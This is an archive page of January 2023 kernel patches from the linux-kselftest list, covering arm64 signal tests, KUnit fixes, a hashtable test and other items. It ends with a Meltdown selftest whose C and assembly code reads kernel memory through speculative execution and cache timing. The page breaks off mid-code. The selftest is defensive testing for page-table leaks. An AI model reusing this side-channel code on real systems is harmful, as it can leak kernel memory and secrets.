January 2023 - Linux-kselftest-mirror

[PATCH v3 0/4] arm64/signal: Support TPIDR2

by Mark Brown

When SME support was merged support for TPIDR2 in signal frames was omitted, meaning that it was not possible for signal handers to inspect or modify it. This will present an issue for programs using signals to implement lightweight threads so let's provide access to TPIDR2 in signal handlers. Implement a new record type for TPIDR2 using the same format as we use for ESR and add coverage to make sure that this appears in the signal context as expected. Due to TPIDR2 being reserved for libc we only validate that the value is unchanged, meaning we're likely to just be validating the default value of 0 on current systems. I have tested with a modified version that sets an explicit value. v3: - Rebase onto v6.2-rc1. v2: - Rebase onto v6.1-rc3. - Change the signal frame magic to 0x54504902 (TPI). To: Catalin Marinas <catalin.marinas(a)arm.com> To: Will Deacon <will(a)kernel.org> To: Shuah Khan <shuah(a)kernel.org> Cc: Szabolcs Nagy <szabolcs.nagy(a)arm.com> Cc: linux-arm-kernel(a)lists.infradead.org Cc: linux-kselftest(a)vger.kernel.org Signed-off-by: Mark Brown <broonie(a)kernel.org> --- Mark Brown (4): arm64/sme: Document ABI for TPIDR2 signal information arm64/signal: Include TPIDR2 in the signal context kselftest/arm64: Add TPIDR2 to the set of known signal context records kselftest/arm64: Add test case for TPIDR2 signal frame records Documentation/arm64/sme.rst | 3 + arch/arm64/include/uapi/asm/sigcontext.h | 8 ++ arch/arm64/kernel/signal.c | 59 ++++++++++++++ tools/testing/selftests/arm64/signal/.gitignore | 1 + .../selftests/arm64/signal/testcases/testcases.c | 4 + .../arm64/signal/testcases/tpidr2_siginfo.c | 90 ++++++++++++++++++++++ 6 files changed, 165 insertions(+) --- base-commit: 1b929c02afd37871d5afb9d498426f83432e71c2 change-id: 20221208-arm64-tpidr2-sig-8fbb93725d8e Best regards, -- Mark Brown <broonie(a)kernel.org>

1 year, 11 months

2
5
0 0

[PATCH 0/6] kselftest/arm64: Build fixes for clang

by Mark Brown

This series provides a few small build fixes and Makefile tweaks which allow us to build the arm64 selftests using clang as well as GCC. I also fixed one minor issue I noticed in the MTE Makefile while doing the updates there. To: Catalin Marinas <catalin.marinas(a)arm.com> To: Will Deacon <will(a)kernel.org> To: Shuah Khan <shuah(a)kernel.org> To: Nathan Chancellor <nathan(a)kernel.org> To: Nick Desaulniers <ndesaulniers(a)google.com> To: Tom Rix <trix(a)redhat.com> Cc: linux-arm-kernel(a)lists.infradead.org Cc: linux-kselftest(a)vger.kernel.org Cc: llvm(a)lists.linux.dev Signed-off-by: Mark Brown <broonie(a)kernel.org> --- Mark Brown (6): kselftest/arm64: Fix .pushsection for strings in FP tests kselftest/arm64: Remove redundant _start labels from FP tests kselftest/arm64: Don't pass headers to the compiler as source kselftest/arm64: Initialise current at build time in signal tests kselftest/arm64: Support build of MTE tests with clang kselftest/arm64: Remove spurious comment from MTE test Makefile tools/testing/selftests/arm64/fp/assembler.h | 2 +- tools/testing/selftests/arm64/fp/fp-pidbench.S | 1 - tools/testing/selftests/arm64/fp/fpsimd-test.S | 1 - tools/testing/selftests/arm64/fp/sve-test.S | 1 - tools/testing/selftests/arm64/fp/za-test.S | 1 - tools/testing/selftests/arm64/mte/Makefile | 21 +++++++++++++++------ tools/testing/selftests/arm64/signal/Makefile | 8 ++++++-- tools/testing/selftests/arm64/signal/test_signals.c | 4 +--- 8 files changed, 23 insertions(+), 16 deletions(-) --- base-commit: b7bfaa761d760e72a969d116517eaa12e404c262 change-id: 20230111-arm64-kselftest-clang-f734b6b0c057 Best regards, -- Mark Brown <broonie(a)kernel.org>

1 year, 11 months

3
8
0 0

[PATCH 0/2] kselftest/arm64: Minor SME signals test additions

by Mark Brown

While discussing the SME signal handling support I realised that we were not verifying that SVE_SIG_FLAG_SM is set for streaming SVE, and not explicitly covering the case where we are both in streaming mode and have ZA enabled. Add coverage of these cases, I didn't find any problems running these new tests. To: Catalin Marinas <catalin.marinas(a)arm.com> To: Will Deacon <will(a)kernel.org> To: Shuah Khan <shuah(a)kernel.org> Cc: linux-arm-kernel(a)lists.infradead.org Cc: linux-kselftest(a)vger.kernel.org Cc: linux-kernel(a)vger.kernel.org Signed-off-by: Mark Brown <broonie(a)kernel.org> --- Mark Brown (2): kselftest/arm64: Verify that SSVE signal context has SVE_SIG_FLAG_SM set kselftest/arm64: Verify simultaneous SSVE and ZA context generation .../selftests/arm64/signal/testcases/ssve_regs.c | 5 + .../arm64/signal/testcases/ssve_za_regs.c | 162 +++++++++++++++++++++ 2 files changed, 167 insertions(+) --- base-commit: b7bfaa761d760e72a969d116517eaa12e404c262 change-id: 20230117-arm64-test-ssve-za-7128c0ce8dc9 Best regards, -- Mark Brown <broonie(a)kernel.org>

1 year, 11 months

2
3
0 0

Re: [PATCH] selftests: amd-pstate: Don't delete source files via Makefile

by Huang Rui

On Fri, Jan 20, 2023 at 01:54:01PM +0800, Doug Smythies wrote: > Revert the portion of a recent Makefile change that incorrectly > deletes source files when doing "make clean". > > Fixes: ba2d788aa873 ("selftests: amd-pstate: Trigger tbench benchmark and test cpus") > Reported-by: Sedat Dilek <sedat.dilek(a)gmail.com> > Tested-by: Sedat Dilek <sedat.dilek(a)gmail.com> > Signed-off-by: Doug Smythies <dsmythies(a)telus.net> (+ Shuah and linux-kselftest mailing list) Thanks for fix! Acked-by: Huang Rui <ray.huang(a)amd.com> > --- > tools/testing/selftests/amd-pstate/Makefile | 5 ----- > 1 file changed, 5 deletions(-) > > diff --git a/tools/testing/selftests/amd-pstate/Makefile b/tools/testing/selftests/amd-pstate/Makefile > index 5f195ee756d6..5fd1424db37d 100644 > --- a/tools/testing/selftests/amd-pstate/Makefile > +++ b/tools/testing/selftests/amd-pstate/Makefile > @@ -7,11 +7,6 @@ all: > uname_M := $(shell uname -m 2>/dev/null || echo not) > ARCH ?= $(shell echo $(uname_M) | sed -e s/i.86/x86/ -e s/x86_64/x86/) > > -ifeq (x86,$(ARCH)) > -TEST_GEN_FILES += ../../../power/x86/amd_pstate_tracer/amd_pstate_trace.py > -TEST_GEN_FILES += ../../../power/x86/intel_pstate_tracer/intel_pstate_tracer.py > -endif > - > TEST_PROGS := run.sh > TEST_FILES := basic.sh tbench.sh gitsource.sh > > -- > 2.25.1 > >

1 year, 11 months

3
4
0 0

[PATCH v2 0/3] Checkpoint Support for Syscall User Dispatch

by Gregory Price

v2: Implements the getter/setter interface in ptrace rather than prctl Syscall user dispatch makes it possible to cleanly intercept system calls from user-land. However, most transparent checkpoint software presently leverages some combination of ptrace and system call injection to place software in a ready-to-checkpoint state. If Syscall User Dispatch is enabled at the time of being quiesced, injected system calls will subsequently be interposed upon and dispatched to the task's signal handler. This patch set implements 3 features to enable software such as CRIU to cleanly interpose upon software leveraging syscall user dispatch. - Implement PTRACE_O_SUSPEND_SYSCALL_USER_DISPATCH, akin to a similar feature for SECCOMP. This allows a ptracer to temporarily disable syscall user dispatch, making syscall injection possible. - Implement an fs/proc extension that reports whether Syscall User Dispatch is being used in proc/status. A similar value is present for SECCOMP, and is used to determine whether special logic is needed during checkpoint/resume. - Implement a getter interface for Syscall User Dispatch config info. To resume successfully, the checkpoint/resume software has to save and restore this information. Presently this configuration is write-only, with no way for C/R software to save it. This was done in ptrace because syscall user dispatch is not part of uapi. The syscall_user_dispatch_config structure was added to the ptrace exports. Signed-off-by: Gregory Price <gregory.price(a)memverge.com> Gregory Price (3): ptrace,syscall_user_dispatch: Implement Syscall User Dispatch Suspension fs/proc/array: Add Syscall User Dispatch to proc status ptrace,syscall_user_dispatch: add a getter/setter for sud configuration .../admin-guide/syscall-user-dispatch.rst | 5 +- fs/proc/array.c | 8 +++ include/linux/ptrace.h | 2 + include/linux/syscall_user_dispatch.h | 19 +++++++ include/uapi/linux/ptrace.h | 16 +++++- kernel/entry/syscall_user_dispatch.c | 54 +++++++++++++++++++ kernel/ptrace.c | 14 +++++ 7 files changed, 116 insertions(+), 2 deletions(-) -- 2.39.0

1 year, 11 months

4
9
0 0

[PATCH V2] tools/testing/kunit/kunit.py: remove redundant double check

by Alexander Pantyukhin

The build_tests function contained double checking for not success result. It is fixed in the current patch. Additional small simplifications of code like using ternary if were applied (avoid using the same operation by calculation times differ in two places). Signed-off-by: Alexander Pantyukhin <apantykhin(a)gmail.com> --- tools/testing/kunit/kunit.py | 19 +++++-------------- 1 file changed, 5 insertions(+), 14 deletions(-) diff --git a/tools/testing/kunit/kunit.py b/tools/testing/kunit/kunit.py index 43fbe96318fe..0e3e08cc0204 100755 --- a/tools/testing/kunit/kunit.py +++ b/tools/testing/kunit/kunit.py @@ -77,11 +77,8 @@ def config_tests(linux: kunit_kernel.LinuxSourceTree, config_start = time.time() success = linux.build_reconfig(request.build_dir, request.make_options) config_end = time.time() - if not success: - return KunitResult(KunitStatus.CONFIG_FAILURE, - config_end - config_start) - return KunitResult(KunitStatus.SUCCESS, - config_end - config_start) + status = KunitStatus.SUCCESS if success else KunitStatus.CONFIG_FAILURE + return KunitResult(status, config_end - config_start) def build_tests(linux: kunit_kernel.LinuxSourceTree, request: KunitBuildRequest) -> KunitResult: @@ -92,14 +89,8 @@ def build_tests(linux: kunit_kernel.LinuxSourceTree, request.build_dir, request.make_options) build_end = time.time() - if not success: - return KunitResult(KunitStatus.BUILD_FAILURE, - build_end - build_start) - if not success: - return KunitResult(KunitStatus.BUILD_FAILURE, - build_end - build_start) - return KunitResult(KunitStatus.SUCCESS, - build_end - build_start) + status = KunitStatus.SUCCESS if success else KunitStatus.BUILD_FAILURE + return KunitResult(status, build_end - build_start) def config_and_build_tests(linux: kunit_kernel.LinuxSourceTree, request: KunitBuildRequest) -> KunitResult: @@ -145,7 +136,7 @@ def exec_tests(linux: kunit_kernel.LinuxSourceTree, request: KunitExecRequest) - tests = _list_tests(linux, request) if request.run_isolated == 'test': filter_globs = tests - if request.run_isolated == 'suite': + elif request.run_isolated == 'suite': filter_globs = _suites_from_test_list(tests) # Apply the test-part of the user's glob, if present. if '.' in request.filter_glob: -- 2.25.1

1 year, 11 months

2
1
0 0

[PATCH] kunit: Export kunit_running()

by Arnd Bergmann

From: Arnd Bergmann <arnd(a)arndb.de> Using kunit_fail_current_test() in a loadable module causes a link error like: ERROR: modpost: "kunit_running" [drivers/gpu/drm/vc4/vc4.ko] undefined! Export the symbol to allow using it from modules. Fixes: da43ff045c3f ("drm/vc4: tests: Fail the current test if we access a register") Signed-off-by: Arnd Bergmann <arnd(a)arndb.de> --- lib/kunit/test.c | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/kunit/test.c b/lib/kunit/test.c index c9ebf975e56b..890ba5b3a981 100644 --- a/lib/kunit/test.c +++ b/lib/kunit/test.c @@ -21,6 +21,7 @@ #include "try-catch-impl.h" DEFINE_STATIC_KEY_FALSE(kunit_running); +EXPORT_SYMBOL_GPL(kunit_running); #if IS_BUILTIN(CONFIG_KUNIT) /* -- 2.39.0

1 year, 11 months

3
3
0 0

[PATCH v2] lib/hashtable_test.c: add test for the hashtable structure

by Rae Moar

Add a KUnit test for the kernel hashtable implementation in include/linux/hashtable.h. Note that this version does not yet test each of the rcu alternative versions of functions. Signed-off-by: Rae Moar <rmoar(a)google.com> --- Changes since v1: - Change Kconfig.debug message to be more succinct. - Directly increment current element's visited field rather than looking up corresponding element. - Use KUNIT_EXPECT_… statements to check keys are within range rather than using if statements. - Change hash_for_each_possible test to check buckets using a hash_for_each method instead of calculating the bucket number using hash_min. Note: The check patch script is outputting open brace errors on lines 158, 192, 247 of lib/hashtable_test.c. However, I think these errors are a mistake as the format of the braces on those lines seems consistent with the Linux Kernel style guide. lib/Kconfig.debug | 13 ++ lib/Makefile | 1 + lib/hashtable_test.c | 326 +++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 340 insertions(+) create mode 100644 lib/hashtable_test.c diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug index 881c3f84e88a..69b1452a3eeb 100644 --- a/lib/Kconfig.debug +++ b/lib/Kconfig.debug @@ -2496,6 +2496,19 @@ config LIST_KUNIT_TEST If unsure, say N. +config HASHTABLE_KUNIT_TEST + tristate "KUnit Test for Kernel Hashtable structures" if !KUNIT_ALL_TESTS + depends on KUNIT + default KUNIT_ALL_TESTS + help + This builds the hashtable KUnit test suite. + It tests the basic functionality of the API defined in + include/linux/hashtable.h. For more information on KUnit and + unit tests in general please refer to the KUnit documentation + in Documentation/dev-tools/kunit/. + + If unsure, say N. + config LINEAR_RANGES_TEST tristate "KUnit test for linear_ranges" depends on KUNIT diff --git a/lib/Makefile b/lib/Makefile index 4d9461bfea42..5f8efbe8e97f 100644 --- a/lib/Makefile +++ b/lib/Makefile @@ -369,6 +369,7 @@ obj-$(CONFIG_PLDMFW) += pldmfw/ CFLAGS_bitfield_kunit.o := $(DISABLE_STRUCTLEAK_PLUGIN) obj-$(CONFIG_BITFIELD_KUNIT) += bitfield_kunit.o obj-$(CONFIG_LIST_KUNIT_TEST) += list-test.o +obj-$(CONFIG_HASHTABLE_KUNIT_TEST) += hashtable_test.o obj-$(CONFIG_LINEAR_RANGES_TEST) += test_linear_ranges.o obj-$(CONFIG_BITS_TEST) += test_bits.o obj-$(CONFIG_CMDLINE_KUNIT_TEST) += cmdline_kunit.o diff --git a/lib/hashtable_test.c b/lib/hashtable_test.c new file mode 100644 index 000000000000..ab09b747d83d --- /dev/null +++ b/lib/hashtable_test.c @@ -0,0 +1,326 @@ +// SPDX-License-Identifier: GPL-2.0 +/* + * KUnit test for the Kernel Hashtable structures. + * + * Copyright (C) 2022, Google LLC. + * Author: Rae Moar <rmoar(a)google.com> + */ +#include <kunit/test.h> + +#include <linux/hashtable.h> + +struct hashtable_test_entry { + int key; + int data; + struct hlist_node node; + int visited; +}; + +static void hashtable_test_hash_init(struct kunit *test) +{ + /* Test the different ways of initialising a hashtable. */ + DEFINE_HASHTABLE(hash1, 3); + DECLARE_HASHTABLE(hash2, 3); + + hash_init(hash1); + hash_init(hash2); + + KUNIT_EXPECT_TRUE(test, hash_empty(hash1)); + KUNIT_EXPECT_TRUE(test, hash_empty(hash2)); +} + +static void hashtable_test_hash_empty(struct kunit *test) +{ + struct hashtable_test_entry a; + DEFINE_HASHTABLE(hash, 3); + + hash_init(hash); + KUNIT_EXPECT_TRUE(test, hash_empty(hash)); + + a.key = 1; + a.data = 13; + hash_add(hash, &a.node, a.key); + + /* Hashtable should no longer be empty. */ + KUNIT_EXPECT_FALSE(test, hash_empty(hash)); +} + +static void hashtable_test_hash_hashed(struct kunit *test) +{ + struct hashtable_test_entry a, b; + DEFINE_HASHTABLE(hash, 3); + + hash_init(hash); + a.key = 1; + a.data = 13; + b.key = 1; + b.data = 2; + + hash_add(hash, &a.node, a.key); + hash_add(hash, &b.node, b.key); + + KUNIT_EXPECT_TRUE(test, hash_hashed(&a.node)); + KUNIT_EXPECT_TRUE(test, hash_hashed(&b.node)); +} + +static void hashtable_test_hash_add(struct kunit *test) +{ + struct hashtable_test_entry a, b, *x; + int bkt; + DEFINE_HASHTABLE(hash, 3); + + hash_init(hash); + a.key = 1; + a.data = 13; + a.visited = 0; + b.key = 2; + b.data = 10; + b.visited = 0; + + hash_add(hash, &a.node, a.key); + hash_add(hash, &b.node, b.key); + + hash_for_each(hash, bkt, x, node) { + x->visited++; + if (x->key == a.key) + KUNIT_EXPECT_EQ(test, x->data, 13); + else if (x->key == b.key) + KUNIT_EXPECT_EQ(test, x->data, 10); + else + KUNIT_FAIL(test, "Unexpected key in hashtable."); + } + + /* Both entries should have been visited exactly once. */ + KUNIT_EXPECT_EQ(test, a.visited, 1); + KUNIT_EXPECT_EQ(test, b.visited, 1); +} + +static void hashtable_test_hash_del(struct kunit *test) +{ + struct hashtable_test_entry a, b, *x; + DEFINE_HASHTABLE(hash, 3); + + hash_init(hash); + a.key = 1; + a.data = 13; + b.key = 2; + b.data = 10; + b.visited = 0; + + hash_add(hash, &a.node, a.key); + hash_add(hash, &b.node, b.key); + + hash_del(&b.node); + hash_for_each_possible(hash, x, node, b.key) { + x->visited++; + KUNIT_EXPECT_NE(test, x->key, b.key); + } + + /* The deleted entry should not have been visited. */ + KUNIT_EXPECT_EQ(test, b.visited, 0); + + hash_del(&a.node); + + /* The hashtable should be empty. */ + KUNIT_EXPECT_TRUE(test, hash_empty(hash)); +} + +static void hashtable_test_hash_for_each(struct kunit *test) +{ + struct hashtable_test_entry entries[3]; + struct hashtable_test_entry *x; + int bkt, i, j, count; + DEFINE_HASHTABLE(hash, 3); + + /* Initialize a hashtable with three entries. */ + hash_init(hash); + for (i = 0; i < 3; i++) { + entries[i].key = i; + entries[i].data = i + 10; + entries[i].visited = 0; + hash_add(hash, &entries[i].node, entries[i].key); + } + + count = 0; + hash_for_each(hash, bkt, x, node) { + x->visited += 1; + KUNIT_ASSERT_GE(test, x->key, 0); + KUNIT_ASSERT_LT(test, x->key, 3); + count++; + } + + /* Should have visited each entry exactly once. */ + KUNIT_EXPECT_EQ(test, count, 3); + for (j = 0; j < 3; j++) + KUNIT_EXPECT_EQ(test, entries[j].visited, 1); +} + +static void hashtable_test_hash_for_each_safe(struct kunit *test) +{ + struct hashtable_test_entry entries[3]; + struct hashtable_test_entry *x; + struct hlist_node *tmp; + int bkt, i, j, count; + DEFINE_HASHTABLE(hash, 3); + + /* Initialize a hashtable with three entries. */ + hash_init(hash); + for (i = 0; i < 3; i++) { + entries[i].key = i; + entries[i].data = i + 10; + entries[i].visited = 0; + hash_add(hash, &entries[i].node, entries[i].key); + } + + count = 0; + hash_for_each_safe(hash, bkt, tmp, x, node) { + x->visited += 1; + KUNIT_ASSERT_GE(test, x->key, 0); + KUNIT_ASSERT_LT(test, x->key, 3); + count++; + + /* Delete entry during loop. */ + hash_del(&x->node); + } + + /* Should have visited each entry exactly once. */ + KUNIT_EXPECT_EQ(test, count, 3); + for (j = 0; j < 3; j++) + KUNIT_EXPECT_EQ(test, entries[j].visited, 1); +} + +static void hashtable_test_hash_for_each_possible(struct kunit *test) +{ + struct hashtable_test_entry entries[4]; + struct hashtable_test_entry *x, *y; + int buckets[2]; + int bkt, i, j, count; + DEFINE_HASHTABLE(hash, 3); + + /* Initialize a hashtable with three entries with key = 0. */ + hash_init(hash); + for (i = 0; i < 3; i++) { + entries[i].key = 0; + entries[i].data = i; + entries[i].visited = 0; + hash_add(hash, &entries[i].node, entries[i].key); + } + + /* Add an entry with key = 1. */ + entries[3].key = 1; + entries[3].data = 3; + entries[3].visited = 0; + hash_add(hash, &entries[3].node, entries[3].key); + + count = 0; + hash_for_each_possible(hash, x, node, 0) { + x->visited += 1; + KUNIT_ASSERT_GE(test, x->data, 0); + KUNIT_ASSERT_LT(test, x->data, 4); + count++; + } + + /* Should have visited each entry with key = 0 exactly once. */ + for (j = 0; j < 3; j++) + KUNIT_EXPECT_EQ(test, entries[j].visited, 1); + + /* Save the buckets for the different keys. */ + hash_for_each(hash, bkt, y, node) { + if (y->key < 0 || y->key > 1) + KUNIT_ASSERT_FAILURE(test, "Unexpected key in hashtable."); + buckets[y->key] = bkt; + } + + /* If entry with key = 1 is in the same bucket as the entries with + * key = 0, check it was visited. Otherwise ensure that only three + * entries were visited. + */ + if (buckets[0] == buckets[1]) { + KUNIT_EXPECT_EQ(test, count, 4); + KUNIT_EXPECT_EQ(test, entries[3].visited, 1); + } else { + KUNIT_EXPECT_EQ(test, count, 3); + KUNIT_EXPECT_EQ(test, entries[3].visited, 0); + } +} + +static void hashtable_test_hash_for_each_possible_safe(struct kunit *test) +{ + struct hashtable_test_entry entries[4]; + struct hashtable_test_entry *x, *y; + struct hlist_node *tmp; + int buckets[2]; + int bkt, i, j, count; + DEFINE_HASHTABLE(hash, 3); + + /* Initialize a hashtable with three entries with key = 0. */ + hash_init(hash); + for (i = 0; i < 3; i++) { + entries[i].key = 0; + entries[i].data = i; + entries[i].visited = 0; + hash_add(hash, &entries[i].node, entries[i].key); + } + + /* Add an entry with key = 1. */ + entries[3].key = 1; + entries[3].data = 3; + entries[3].visited = 0; + hash_add(hash, &entries[3].node, entries[3].key); + + count = 0; + hash_for_each_possible_safe(hash, x, tmp, node, 0) { + x->visited += 1; + KUNIT_ASSERT_GE(test, x->data, 0); + KUNIT_ASSERT_LT(test, x->data, 4); + count++; + + /* Delete entry during loop. */ + hash_del(&x->node); + } + + /* Should have visited each entry with key = 0 exactly once. */ + for (j = 0; j < 3; j++) + KUNIT_EXPECT_EQ(test, entries[j].visited, 1); + + /* Save the buckets for the different keys. */ + hash_for_each(hash, bkt, y, node) { + if (y->key < 0 || y->key > 1) + KUNIT_ASSERT_FAILURE(test, "Unexpected key in hashtable."); + buckets[y->key] = bkt; + } + + /* If entry with key = 1 is in the same bucket as the entries with + * key = 0, check it was visited. Otherwise ensure that only three + * entries were visited. + */ + if (buckets[0] == buckets[1]) { + KUNIT_EXPECT_EQ(test, count, 4); + KUNIT_EXPECT_EQ(test, entries[3].visited, 1); + } else { + KUNIT_EXPECT_EQ(test, count, 3); + KUNIT_EXPECT_EQ(test, entries[3].visited, 0); + } +} + +static struct kunit_case hashtable_test_cases[] = { + KUNIT_CASE(hashtable_test_hash_init), + KUNIT_CASE(hashtable_test_hash_empty), + KUNIT_CASE(hashtable_test_hash_hashed), + KUNIT_CASE(hashtable_test_hash_add), + KUNIT_CASE(hashtable_test_hash_del), + KUNIT_CASE(hashtable_test_hash_for_each), + KUNIT_CASE(hashtable_test_hash_for_each_safe), + KUNIT_CASE(hashtable_test_hash_for_each_possible), + KUNIT_CASE(hashtable_test_hash_for_each_possible_safe), + {}, +}; + +static struct kunit_suite hashtable_test_module = { + .name = "hashtable", + .test_cases = hashtable_test_cases, +}; + +kunit_test_suites(&hashtable_test_module); + +MODULE_LICENSE("GPL"); base-commit: 88603b6dc419445847923fcb7fe5080067a30f98 -- 2.39.0.314.g84b9a713c41-goog

1 year, 11 months

2
1
0 0

[PATCH v2] selftest/x86/meltdown: Add a selftest for meltdown

by Aaron Lu

To capture potential programming errors like mistakenly setting Global bit on kernel page table entries, a selftest for meltdown is added. This selftest is based on https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdow… In addition to the existing test of reading kernel variable saved_command_line from user space, one more test of reading user local variable through kernel direct map address is added. For the existing test to report a failure, both the high kernel mapping and low kernel mapping have to be in leaked state; For the added test, only low kernel mapping leak is enough to trigger a test fail, so both tests are useful. Test results of 10 runs: On v6.1-rc8 with nopti kernel cmdline option: host test_out_rate_1 test_out_rate_2 lkp-bdw-de1 50% 100% lkp-hsw-d01 70% 100% lkp-hsw-d02 0% 80% lkp-hsw-d03 60% 100% lkp-hsw-d04 20% 100% lkp-hsw-d05 60% 100% lkp-ivb-d01 0% 70% lkp-kbl-d01 100% 100% lkp-skl-d02 100% 90% lkp-skl-d03 90% 100% lkp-skl-d05 60% 100% kbl-vm 100% 80% 2 other machines have 0% rate for both tests. bdw=broadwell, hsw=haswell, ivb=ivybridge, etc. test_out_rate_1: test reports fail rate for the test of reading saved_command_line from user space; test_out_rate_2: test reports fail rate for the test of reading user local variable through kernel direct map address in user space. On v5.19 without nopti cmdline option: host test_out_rate_2 lkp-bdw-de1 80% lkp-hsw-4ex1 50% lkp-hsw-d01 30% lkp-hsw-d03 10% lkp-hsw-d04 10% lkp-kbl-d01 10% kbl-vm 80% 7 other machines have 0% rate for test2. Also tested on an i386 VM with 512M memory and the test out rate is 100% when adding nopti to kernel cmdline with v6.1-rc8. Main changes I made from ltp's meltdown test: - Replace rdtscll() and clflush() with kernel's implementation; - Reimplement find_symbol_in_file() to avoid bringing in LTP's library functions; - Coding style changes: placing the function return type in the same line of the function. Signed-off-by: Aaron Lu <aaron.lu(a)intel.com> Reviewed-by: Pavel Boldin <boldin.pavel(a)gmail.com> --- v2: add Pavel Boldin's reviewed-by tag. tools/testing/selftests/x86/Makefile | 2 +- tools/testing/selftests/x86/meltdown.c | 529 +++++++++++++++++++++++++ 2 files changed, 530 insertions(+), 1 deletion(-) create mode 100644 tools/testing/selftests/x86/meltdown.c diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile index 0388c4d60af0..36f99c360a56 100644 --- a/tools/testing/selftests/x86/Makefile +++ b/tools/testing/selftests/x86/Makefile @@ -13,7 +13,7 @@ CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie) TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \ check_initial_reg_state sigreturn iopl ioperm \ test_vsyscall mov_ss_trap \ - syscall_arg_fault fsgsbase_restore sigaltstack + syscall_arg_fault fsgsbase_restore sigaltstack meltdown TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \ test_FCMOV test_FCOMI test_FISTTP \ vdso_restorer diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c new file mode 100644 index 000000000000..fcb211dc9038 --- /dev/null +++ b/tools/testing/selftests/x86/meltdown.c @@ -0,0 +1,529 @@ +// SPDX-License-Identifier: GPL-2.0-or-later +/* + * Copyright (c) 2018 Pavel Boldin <pboldin(a)cloudlinux.com> + * https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdow… + */ + +#define _GNU_SOURCE +#include <stdio.h> +#include <stdlib.h> +#include <stdint.h> +#include <stdarg.h> +#include <string.h> +#include <signal.h> +#include <ucontext.h> +#include <unistd.h> +#include <fcntl.h> +#include <ctype.h> +#include <sys/utsname.h> +#include <sys/mman.h> + +#define PAGE_SHIFT 12 +#define PAGE_SIZE 0x1000 +#define PUD_SHIFT 30 +#define PUD_SIZE (1UL << PUD_SHIFT) +#define PUD_MASK (~(PUD_SIZE - 1)) + +size_t cache_miss_threshold; +unsigned long directmap_base; + +#define TARGET_OFFSET 9 +#define TARGET_SIZE (1 << TARGET_OFFSET) +#define BITS_BY_READ 2 + +static inline uint64_t rdtsc(void) +{ + uint32_t eax, edx; + uint64_t tsc_val; + /* + * The lfence is to wait (on Intel CPUs) until all previous + * instructions have been executed. If software requires RDTSC to be + * executed prior to execution of any subsequent instruction, it can + * execute LFENCE immediately after RDTSC + * */ + __asm__ __volatile__("lfence; rdtsc; lfence" : "=a"(eax), "=d"(edx)); + tsc_val = ((uint64_t)edx) << 32 | eax; + return tsc_val; +} + +static inline void clflush(volatile void *__p) +{ + asm volatile("clflush %0" : "+m" (*(volatile char *)__p)); +} + +static char target_array[BITS_BY_READ * TARGET_SIZE]; + +static void clflush_target(void) +{ + int i; + + for (i = 0; i < BITS_BY_READ; i++) + clflush(&target_array[i * TARGET_SIZE]); +} + +extern char failshere[]; +extern char stopspeculate[]; + +static void __attribute__((noinline)) speculate(unsigned long addr, char bit) +{ + register char mybit asm ("cl") = bit; +#ifdef __x86_64__ + asm volatile ( + "1:\n\t" + + ".rept 300\n\t" + "add $0x141, %%rax\n\t" + ".endr\n" + + "failshere:\n\t" + "movb (%[addr]), %%al\n\t" + "ror %[bit], %%rax\n\t" + "and $1, %%rax\n\t" + "shl $9, %%rax\n\t" + "jz 1b\n\t" + + "movq (%[target], %%rax, 1), %%rbx\n" + + "stopspeculate: \n\t" + "nop\n\t" + : + : [target] "r" (target_array), + [addr] "r" (addr), + [bit] "r" (mybit) + : "rax", "rbx" + ); +#else /* defined(__x86_64__) */ + asm volatile ( + "1:\n\t" + + ".rept 300\n\t" + "add $0x141, %%eax\n\t" + ".endr\n" + + "failshere:\n\t" + "movb (%[addr]), %%al\n\t" + "ror %[bit], %%eax\n\t" + "and $1, %%eax\n\t" + "shl $9, %%eax\n\t" + "jz 1b\n\t" + + "movl (%[target], %%eax, 1), %%ebx\n" + + "stopspeculate: \n\t" + "nop\n\t" + : + : [target] "r" (target_array), + [addr] "r" (addr), + [bit] "r" (mybit) + : "rax", "ebx" + ); +#endif +} + +#ifdef __i386__ +# define REG_RIP REG_EIP +#endif + +static void sigsegv(int sig, siginfo_t *siginfo, void *context) +{ + ucontext_t *ucontext = context; + unsigned long *prip = (unsigned long *)&ucontext->uc_mcontext.gregs[REG_RIP]; + if (*prip != (unsigned long)failshere) { + printf("Segmentation fault at unexpected location %lx\n", *prip); + abort(); + } + *prip = (unsigned long)stopspeculate; + return; +} + +static int set_signal(void) +{ + struct sigaction act = { + .sa_sigaction = sigsegv, + .sa_flags = SA_SIGINFO, + }; + + return sigaction(SIGSEGV, &act, NULL); +} + +static inline int get_access_time(volatile char *addr) +{ + unsigned long long time1, time2; + volatile int j __attribute__((__unused__)); + + time1 = rdtsc(); + j = *addr; + time2 = rdtsc(); + + return time2 - time1; +} + +static int cache_hit_threshold; +static int hist[BITS_BY_READ]; + +static void check(void) +{ + int i, time; + volatile char *addr; + + for (i = 0; i < BITS_BY_READ; i++) { + addr = &target_array[i * TARGET_SIZE]; + + time = get_access_time(addr); + + if (time <= cache_hit_threshold) + hist[i]++; + } +} + +#define CYCLES 10000 +static int readbit(int fd, unsigned long addr, char bit) +{ + int i, ret; + static char buf[256]; + + memset(hist, 0, sizeof(hist)); + + for (i = 0; i < CYCLES; i++) { + /* + * Make the to-be-stolen data cache and tlb hot + * to increase success rate. + */ + ret = pread(fd, buf, sizeof(buf), 0); + if (ret < 0) + printf("[INFO]\tCan't read fd"); + + clflush_target(); + + speculate(addr, bit); + check(); + } + + if (hist[1] > CYCLES / 10) + return 1; + return 0; +} + +static int readbyte(int fd, unsigned long addr) +{ + int bit, res = 0; + + for (bit = 0; bit < 8; bit ++ ) + res |= (readbit(fd, addr, bit) << bit); + + return res; +} + +static int mysqrt(long val) +{ + int root = val / 2, prevroot = 0, i = 0; + + while (prevroot != root && i++ < 100) { + prevroot = root; + root = (val / root + root) / 2; + } + + return root; +} + +#define ESTIMATE_CYCLES 1000000 +static void set_cache_hit_threshold(void) +{ + long cached, uncached, i; + + for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) + cached += 